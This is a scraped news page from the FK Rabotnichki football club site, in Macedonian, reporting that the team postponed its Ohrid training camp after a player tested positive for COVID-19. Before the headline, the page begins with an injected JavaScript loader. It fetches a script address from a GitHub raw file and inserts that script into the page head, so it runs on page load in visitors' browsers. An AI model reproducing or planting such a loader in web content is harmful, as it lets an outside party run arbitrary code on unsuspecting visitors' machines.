;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Работнички не отпатува на подготовки поради позитивен случај на коронавирус
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Работнички не отпатува на подготовки поради позитивен случај на коронавирус

ФК Работнички не отпатува на подготовки во Охрид откако се појави фудбалер со позитивен тест на коронавирус. Иако фудбалерот нема симптоми на Covid-19, ФК Работнички како социјално одговорен колектив одлучи во моментот да ги одложи подготовките и да ги следи протоколите при ваква ситуација. Сите членови на тимот, стручниот штаб и вработените во клубот пред десетина дена имаа негативни тестови, но сега повторно ќе бидат тестирани, а и фудбалерот кој има позитивен тест ќе замине во задолжителна изолација и потоа повторно ќе се тестира, до повторно враќање во екипата со негативен тест.

Во моментот, неизвесни се и закажаните пријателски натпревари кои беа закажани во периодот на летните подготовки. ФК Работнички со врвен приоритет ќе ги следи инструкциите од Институтот за јавно здравје. Се надеваме дека многу брзо се ќе биде в ред, му посакуваме добро здравје на фудбалерот кој покажа позитивен тест на Covid-19 и се надеваме дека многу брзо повторно ќе бидеме комплетни и ќе ги продолжиме подготовките за новата сезона во Првата лига.